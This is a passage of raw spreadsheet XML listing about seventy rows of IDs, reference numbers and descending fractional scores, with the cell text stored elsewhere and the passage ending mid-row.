  <sheetData>
    <row r="1">
      <c r="B1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1">
        <v>8075.0</v>
      </c>
      <c r="B2" s="2">
        <v>5.3006212E7</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>5</v>
      </c>
      <c r="D2" s="2">
        <v>1.0</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2" s="2">
        <v>0.3582375478927203</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1">
        <v>7137.0</v>
      </c>
      <c r="B3" s="2">
        <v>5.0440931E7</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>7</v>
      </c>
      <c r="D3" s="2">
        <v>1.0</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="2">
        <v>0.3010510510510511</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1">
        <v>28146.0</v>
      </c>
      <c r="B4" s="2">
        <v>2.481048E7</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>8</v>
      </c>
      <c r="D4" s="2">
        <v>1.0</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F4" s="2">
        <v>0.2920524691358025</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1">
        <v>9198.0</v>
      </c>
      <c r="B5" s="2">
        <v>5.5395847E7</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="2">
        <v>1.0</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F5" s="2">
        <v>0.289832285115304</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1">
        <v>31007.0</v>
      </c>
      <c r="B6" s="2">
        <v>4.7684766E7</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>8</v>
      </c>
      <c r="D6" s="2">
        <v>1.0</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F6" s="2">
        <v>0.2897376543209876</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1">
        <v>26355.0</v>
      </c>
      <c r="B7" s="2">
        <v>1.6829778E7</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="2">
        <v>1.0</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F7" s="2">
        <v>0.2552334943639292</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1">
        <v>20973.0</v>
      </c>
      <c r="B8" s="2">
        <v>1.6829779E7</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="2">
        <v>1.0</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F8" s="2">
        <v>0.2520128824476651</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1">
        <v>26172.0</v>
      </c>
      <c r="B9" s="2">
        <v>1.6139328E7</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>11</v>
      </c>
      <c r="D9" s="2">
        <v>1.0</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F9" s="2">
        <v>0.2471819645732689</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1">
        <v>32872.0</v>
      </c>
      <c r="B10" s="2">
        <v>6310823.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>12</v>
      </c>
      <c r="D10" s="2">
        <v>1.0</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F10" s="2">
        <v>0.2465277777777778</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1">
        <v>30069.0</v>
      </c>
      <c r="B11" s="2">
        <v>3625217.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>13</v>
      </c>
      <c r="D11" s="2">
        <v>1.0</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F11" s="2">
        <v>0.2377450980392157</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1">
        <v>21622.0</v>
      </c>
      <c r="B12" s="2">
        <v>2.4592779E7</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D12" s="2">
        <v>1.0</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F12" s="2">
        <v>0.2365319865319866</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1">
        <v>32309.0</v>
      </c>
      <c r="B13" s="2">
        <v>5.5660889E7</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>15</v>
      </c>
      <c r="D13" s="2">
        <v>1.0</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F13" s="2">
        <v>0.2335069444444445</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1">
        <v>23389.0</v>
      </c>
      <c r="B14" s="2">
        <v>5.566089E7</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>15</v>
      </c>
      <c r="D14" s="2">
        <v>1.0</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F14" s="2">
        <v>0.2317708333333334</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1">
        <v>31441.0</v>
      </c>
      <c r="B15" s="2">
        <v>5.0219757E7</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D15" s="2">
        <v>1.0</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F15" s="2">
        <v>0.2158469945355192</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1">
        <v>31445.0</v>
      </c>
      <c r="B16" s="2">
        <v>5.0258003E7</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D16" s="2">
        <v>1.0</v>
      </c>
      <c r="E16" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F16" s="2">
        <v>0.2158469945355192</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="1">
        <v>30561.0</v>
      </c>
      <c r="B17" s="2">
        <v>4.0785965E7</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>17</v>
      </c>
      <c r="D17" s="2">
        <v>1.0</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F17" s="2">
        <v>0.2155555555555556</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="1">
        <v>27758.0</v>
      </c>
      <c r="B18" s="2">
        <v>2.3106085E7</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>18</v>
      </c>
      <c r="D18" s="2">
        <v>1.0</v>
      </c>
      <c r="E18" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F18" s="2">
        <v>0.2151162790697675</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1">
        <v>27920.0</v>
      </c>
      <c r="B19" s="2">
        <v>2.3753392E7</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>19</v>
      </c>
      <c r="D19" s="2">
        <v>1.0</v>
      </c>
      <c r="E19" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F19" s="2">
        <v>0.212719298245614</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="1">
        <v>22823.0</v>
      </c>
      <c r="B20" s="2">
        <v>4.6311087E7</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D20" s="2">
        <v>1.0</v>
      </c>
      <c r="E20" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F20" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="1">
        <v>22130.0</v>
      </c>
      <c r="B21" s="2">
        <v>3.1045798E7</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>21</v>
      </c>
      <c r="D21" s="2">
        <v>1.0</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F21" s="2">
        <v>0.2095959595959596</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="1">
        <v>29284.0</v>
      </c>
      <c r="B22" s="2">
        <v>3.1045797E7</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>21</v>
      </c>
      <c r="D22" s="2">
        <v>1.0</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F22" s="2">
        <v>0.2095959595959596</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="1">
        <v>21431.0</v>
      </c>
      <c r="B23" s="2">
        <v>2.2166018E7</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>22</v>
      </c>
      <c r="D23" s="2">
        <v>1.0</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F23" s="2">
        <v>0.206989247311828</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="A24" s="1">
        <v>15412.0</v>
      </c>
      <c r="B24" s="2">
        <v>4.2867603E7</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>23</v>
      </c>
      <c r="D24" s="2">
        <v>1.0</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F24" s="2">
        <v>0.2062404870624049</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="A25" s="1">
        <v>30877.0</v>
      </c>
      <c r="B25" s="2">
        <v>4.6311086E7</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D25" s="2">
        <v>1.0</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F25" s="2">
        <v>0.2059386973180077</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1">
      <c r="A26" s="1">
        <v>25256.0</v>
      </c>
      <c r="B26" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>24</v>
      </c>
      <c r="D26" s="2">
        <v>1.0</v>
      </c>
      <c r="E26" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F26" s="2">
        <v>0.2055555555555556</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1">
      <c r="A27" s="1">
        <v>25368.0</v>
      </c>
      <c r="B27" s="2">
        <v>1.3605356E7</v>
      </c>
      <c r="C27" s="2" t="s">
        <v>25</v>
      </c>
      <c r="D27" s="2">
        <v>1.0</v>
      </c>
      <c r="E27" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F27" s="2">
        <v>0.204331450094162</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1">
      <c r="A28" s="1">
        <v>29237.0</v>
      </c>
      <c r="B28" s="2">
        <v>3.0839651E7</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>26</v>
      </c>
      <c r="D28" s="2">
        <v>1.0</v>
      </c>
      <c r="E28" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F28" s="2">
        <v>0.2042735042735043</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1">
      <c r="A29" s="1">
        <v>29565.0</v>
      </c>
      <c r="B29" s="2">
        <v>3.3232204E7</v>
      </c>
      <c r="C29" s="2" t="s">
        <v>27</v>
      </c>
      <c r="D29" s="2">
        <v>1.0</v>
      </c>
      <c r="E29" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F29" s="2">
        <v>0.2039930555555556</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1">
      <c r="A30" s="1">
        <v>22365.0</v>
      </c>
      <c r="B30" s="2">
        <v>3.4905893E7</v>
      </c>
      <c r="C30" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D30" s="2">
        <v>1.0</v>
      </c>
      <c r="E30" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F30" s="2">
        <v>0.2027777777777778</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1">
      <c r="A31" s="1">
        <v>21650.0</v>
      </c>
      <c r="B31" s="2">
        <v>2.4875149E7</v>
      </c>
      <c r="C31" s="2" t="s">
        <v>29</v>
      </c>
      <c r="D31" s="2">
        <v>1.0</v>
      </c>
      <c r="E31" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F31" s="2">
        <v>0.2022569444444445</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1">
      <c r="A32" s="1">
        <v>21058.0</v>
      </c>
      <c r="B32" s="2">
        <v>1.7800515E7</v>
      </c>
      <c r="C32" s="2" t="s">
        <v>30</v>
      </c>
      <c r="D32" s="2">
        <v>1.0</v>
      </c>
      <c r="E32" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F32" s="2">
        <v>0.2016129032258065</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1">
      <c r="A33" s="1">
        <v>26553.0</v>
      </c>
      <c r="B33" s="2">
        <v>1.7800514E7</v>
      </c>
      <c r="C33" s="2" t="s">
        <v>30</v>
      </c>
      <c r="D33" s="2">
        <v>1.0</v>
      </c>
      <c r="E33" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F33" s="2">
        <v>0.199820788530466</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1">
      <c r="A34" s="1">
        <v>29806.0</v>
      </c>
      <c r="B34" s="2">
        <v>3.5174229E7</v>
      </c>
      <c r="C34" s="2" t="s">
        <v>31</v>
      </c>
      <c r="D34" s="2">
        <v>1.0</v>
      </c>
      <c r="E34" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F34" s="2">
        <v>0.1994949494949495</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1">
      <c r="A35" s="1">
        <v>21556.0</v>
      </c>
      <c r="B35" s="2">
        <v>2.3651463E7</v>
      </c>
      <c r="C35" s="2" t="s">
        <v>32</v>
      </c>
      <c r="D35" s="2">
        <v>1.0</v>
      </c>
      <c r="E35" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F35" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1">
      <c r="A36" s="1">
        <v>27893.0</v>
      </c>
      <c r="B36" s="2">
        <v>2.3651462E7</v>
      </c>
      <c r="C36" s="2" t="s">
        <v>33</v>
      </c>
      <c r="D36" s="2">
        <v>1.0</v>
      </c>
      <c r="E36" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F36" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1">
      <c r="A37" s="1">
        <v>23499.0</v>
      </c>
      <c r="B37" s="2">
        <v>5769084.0</v>
      </c>
      <c r="C37" s="2" t="s">
        <v>34</v>
      </c>
      <c r="D37" s="2">
        <v>1.0</v>
      </c>
      <c r="E37" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F37" s="2">
        <v>0.1987847222222223</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1">
      <c r="A38" s="1">
        <v>22310.0</v>
      </c>
      <c r="B38" s="2">
        <v>3.3829703E7</v>
      </c>
      <c r="C38" s="2" t="s">
        <v>35</v>
      </c>
      <c r="D38" s="2">
        <v>1.0</v>
      </c>
      <c r="E38" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F38" s="2">
        <v>0.1986817325800377</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1">
      <c r="A39" s="1">
        <v>20410.0</v>
      </c>
      <c r="B39" s="2">
        <v>1.2209852E7</v>
      </c>
      <c r="C39" s="2" t="s">
        <v>36</v>
      </c>
      <c r="D39" s="2">
        <v>1.0</v>
      </c>
      <c r="E39" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F39" s="2">
        <v>0.1980286738351255</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1">
      <c r="A40" s="1">
        <v>28888.0</v>
      </c>
      <c r="B40" s="2">
        <v>2.9242847E7</v>
      </c>
      <c r="C40" s="2" t="s">
        <v>37</v>
      </c>
      <c r="D40" s="2">
        <v>1.0</v>
      </c>
      <c r="E40" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F40" s="2">
        <v>0.1978114478114478</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1">
      <c r="A41" s="1">
        <v>28155.0</v>
      </c>
      <c r="B41" s="2">
        <v>2.4875148E7</v>
      </c>
      <c r="C41" s="2" t="s">
        <v>29</v>
      </c>
      <c r="D41" s="2">
        <v>1.0</v>
      </c>
      <c r="E41" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F41" s="2">
        <v>0.1970486111111112</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1">
      <c r="A42" s="1">
        <v>31995.0</v>
      </c>
      <c r="B42" s="2">
        <v>5.3316483E7</v>
      </c>
      <c r="C42" s="2" t="s">
        <v>38</v>
      </c>
      <c r="D42" s="2">
        <v>1.0</v>
      </c>
      <c r="E42" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F42" s="2">
        <v>0.1968954248366014</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1">
      <c r="A43" s="1">
        <v>32529.0</v>
      </c>
      <c r="B43" s="2">
        <v>5.7339863E7</v>
      </c>
      <c r="C43" s="2" t="s">
        <v>39</v>
      </c>
      <c r="D43" s="2">
        <v>1.0</v>
      </c>
      <c r="E43" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F43" s="2">
        <v>0.1965174129353234</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1">
      <c r="A44" s="1">
        <v>34158.0</v>
      </c>
      <c r="B44" s="2">
        <v>9878933.0</v>
      </c>
      <c r="C44" s="2" t="s">
        <v>40</v>
      </c>
      <c r="D44" s="2">
        <v>1.0</v>
      </c>
      <c r="E44" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F44" s="2">
        <v>0.1965174129353234</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1">
      <c r="A45" s="1">
        <v>27862.0</v>
      </c>
      <c r="B45" s="2">
        <v>2.3507245E7</v>
      </c>
      <c r="C45" s="2" t="s">
        <v>41</v>
      </c>
      <c r="D45" s="2">
        <v>1.0</v>
      </c>
      <c r="E45" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F45" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1">
      <c r="A46" s="1">
        <v>17022.0</v>
      </c>
      <c r="B46" s="2">
        <v>4.8457408E7</v>
      </c>
      <c r="C46" s="2" t="s">
        <v>42</v>
      </c>
      <c r="D46" s="2">
        <v>1.0</v>
      </c>
      <c r="E46" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F46" s="2">
        <v>0.19558599695586</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1">
      <c r="A47" s="1">
        <v>22575.0</v>
      </c>
      <c r="B47" s="2">
        <v>3.8697757E7</v>
      </c>
      <c r="C47" s="2" t="s">
        <v>43</v>
      </c>
      <c r="D47" s="2">
        <v>1.0</v>
      </c>
      <c r="E47" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F47" s="2">
        <v>0.1948853615520283</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1">
      <c r="A48" s="1">
        <v>22727.0</v>
      </c>
      <c r="B48" s="2">
        <v>4.383764E7</v>
      </c>
      <c r="C48" s="2" t="s">
        <v>44</v>
      </c>
      <c r="D48" s="2">
        <v>1.0</v>
      </c>
      <c r="E48" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F48" s="2">
        <v>0.1948853615520283</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1">
      <c r="A49" s="1">
        <v>30398.0</v>
      </c>
      <c r="B49" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C49" s="2" t="s">
        <v>44</v>
      </c>
      <c r="D49" s="2">
        <v>1.0</v>
      </c>
      <c r="E49" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F49" s="2">
        <v>0.1948853615520283</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1">
      <c r="A50" s="1">
        <v>31447.0</v>
      </c>
      <c r="B50" s="2">
        <v>5.0292234E7</v>
      </c>
      <c r="C50" s="2" t="s">
        <v>45</v>
      </c>
      <c r="D50" s="2">
        <v>1.0</v>
      </c>
      <c r="E50" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F50" s="2">
        <v>0.1948590381426202</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1">
      <c r="A51" s="1">
        <v>21925.0</v>
      </c>
      <c r="B51" s="2">
        <v>2.8440231E7</v>
      </c>
      <c r="C51" s="2" t="s">
        <v>46</v>
      </c>
      <c r="D51" s="2">
        <v>1.0</v>
      </c>
      <c r="E51" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F51" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1">
      <c r="A52" s="1">
        <v>31376.0</v>
      </c>
      <c r="B52" s="2">
        <v>4994051.0</v>
      </c>
      <c r="C52" s="2" t="s">
        <v>47</v>
      </c>
      <c r="D52" s="2">
        <v>1.0</v>
      </c>
      <c r="E52" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F52" s="2">
        <v>0.1939890710382514</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1">
      <c r="A53" s="1">
        <v>21383.0</v>
      </c>
      <c r="B53" s="2">
        <v>2.1686959E7</v>
      </c>
      <c r="C53" s="2" t="s">
        <v>48</v>
      </c>
      <c r="D53" s="2">
        <v>1.0</v>
      </c>
      <c r="E53" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F53" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1">
      <c r="A54" s="1">
        <v>7232.0</v>
      </c>
      <c r="B54" s="2">
        <v>5.0668402E7</v>
      </c>
      <c r="C54" s="2" t="s">
        <v>49</v>
      </c>
      <c r="D54" s="2">
        <v>1.0</v>
      </c>
      <c r="E54" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F54" s="2">
        <v>0.192652329749104</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1">
      <c r="A55" s="1">
        <v>28729.0</v>
      </c>
      <c r="B55" s="2">
        <v>2.7959751E7</v>
      </c>
      <c r="C55" s="2" t="s">
        <v>50</v>
      </c>
      <c r="D55" s="2">
        <v>1.0</v>
      </c>
      <c r="E55" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F55" s="2">
        <v>0.1918402777777778</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1">
      <c r="A56" s="1">
        <v>27372.0</v>
      </c>
      <c r="B56" s="2">
        <v>2.1686957E7</v>
      </c>
      <c r="C56" s="2" t="s">
        <v>48</v>
      </c>
      <c r="D56" s="2">
        <v>1.0</v>
      </c>
      <c r="E56" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F56" s="2">
        <v>0.1913580246913581</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1">
      <c r="A57" s="1">
        <v>27464.0</v>
      </c>
      <c r="B57" s="2">
        <v>2.1987265E7</v>
      </c>
      <c r="C57" s="2" t="s">
        <v>51</v>
      </c>
      <c r="D57" s="2">
        <v>1.0</v>
      </c>
      <c r="E57" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F57" s="2">
        <v>0.1910774410774411</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1">
      <c r="A58" s="1">
        <v>23145.0</v>
      </c>
      <c r="B58" s="2">
        <v>5.1724976E7</v>
      </c>
      <c r="C58" s="2" t="s">
        <v>52</v>
      </c>
      <c r="D58" s="2">
        <v>1.0</v>
      </c>
      <c r="E58" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F58" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1">
      <c r="A59" s="1">
        <v>29485.0</v>
      </c>
      <c r="B59" s="2">
        <v>3.2469301E7</v>
      </c>
      <c r="C59" s="2" t="s">
        <v>53</v>
      </c>
      <c r="D59" s="2">
        <v>1.0</v>
      </c>
      <c r="E59" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F59" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1">
      <c r="A60" s="1">
        <v>33068.0</v>
      </c>
      <c r="B60" s="2">
        <v>6839234.0</v>
      </c>
      <c r="C60" s="2" t="s">
        <v>54</v>
      </c>
      <c r="D60" s="2">
        <v>1.0</v>
      </c>
      <c r="E60" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F60" s="2">
        <v>0.18993993993994</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1">
      <c r="A61" s="1">
        <v>29121.0</v>
      </c>
      <c r="B61" s="2">
        <v>3.0456054E7</v>
      </c>
      <c r="C61" s="2" t="s">
        <v>55</v>
      </c>
      <c r="D61" s="2">
        <v>1.0</v>
      </c>
      <c r="E61" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F61" s="2">
        <v>0.1894243641231593</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1">
      <c r="A62" s="1">
        <v>29646.0</v>
      </c>
      <c r="B62" s="2">
        <v>3.3829702E7</v>
      </c>
      <c r="C62" s="2" t="s">
        <v>35</v>
      </c>
      <c r="D62" s="2">
        <v>1.0</v>
      </c>
      <c r="E62" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F62" s="2">
        <v>0.1892655367231639</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1">
      <c r="A63" s="1">
        <v>17946.0</v>
      </c>
      <c r="B63" s="2">
        <v>5.1249872E7</v>
      </c>
      <c r="C63" s="2" t="s">
        <v>56</v>
      </c>
      <c r="D63" s="2">
        <v>1.0</v>
      </c>
      <c r="E63" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F63" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1">
      <c r="A64" s="1">
        <v>29566.0</v>
      </c>
      <c r="B64" s="2">
        <v>3.3232204E7</v>
      </c>
      <c r="C64" s="2" t="s">
        <v>57</v>
      </c>
      <c r="D64" s="2">
        <v>1.0</v>
      </c>
      <c r="E64" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F64" s="2">
        <v>0.189068100358423</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1">
      <c r="A65" s="1">
        <v>21903.0</v>
      </c>
      <c r="B65" s="2">
        <v>2.7959752E7</v>
      </c>
      <c r="C65" s="2" t="s">
        <v>50</v>
      </c>
      <c r="D65" s="2">
        <v>1.0</v>
      </c>
      <c r="E65" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F65" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1">
      <c r="A66" s="1">
        <v>28298.0</v>
      </c>
      <c r="B66" s="2">
        <v>2.5602718E7</v>
      </c>
      <c r="C66" s="2" t="s">
        <v>58</v>
      </c>
      <c r="D66" s="2">
        <v>1.0</v>
      </c>
      <c r="E66" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F66" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1">
      <c r="A67" s="1">
        <v>21864.0</v>
      </c>
      <c r="B67" s="2">
        <v>2.7415667E7</v>
      </c>
      <c r="C67" s="2" t="s">
        <v>59</v>
      </c>
      <c r="D67" s="2">
        <v>1.0</v>
      </c>
      <c r="E67" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F67" s="2">
        <v>0.1871794871794872</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1">
      <c r="A68" s="1">
        <v>22868.0</v>
      </c>
      <c r="B68" s="2">
        <v>4.74652E7</v>
      </c>
      <c r="C68" s="2" t="s">
        <v>60</v>
      </c>
      <c r="D68" s="2">
        <v>1.0</v>
      </c>
      <c r="E68" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F68" s="2">
        <v>0.1871794871794872</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1">
      <c r="A69" s="1">
        <v>27863.0</v>
      </c>
      <c r="B69" s="2">
        <v>2.3507245E7</v>
      </c>
      <c r="C69" s="2" t="s">
        <v>61</v>
      </c>
      <c r="D69" s="2">
        <v>1.0</v>
      </c>
      <c r="E69" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F69" s="2">
        <v>0.1866319444444445</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1">
      <c r="A70" s="1">
        <v>22107.0</v>
      </c>
      <c r="B70" s="2">
        <v>3.0858934E7</v>
      </c>
      <c r="C70" s="2" t="s">
        <v>62</v>
      </c>
      <c r="D70" s="2">
        <v>1.0</v>
      </c>
      <c r="E70" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F70" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1">
      <c r="A71" s="1">
        <v>25541.0</v>
      </c>
      <c r="B71" s="2">
        <v>1.4270182E7</v>
      </c>
      <c r="C71" s="2" t="s">
        <v>63</v>
      </c>
      <c r="D71" s="2">
        <v>1.0</v>
      </c>
      <c r="E71" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F71" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1">
      <c r="A72" s="1">
        <v>29251.0</v>
      </c>
      <c r="B72" s="2">
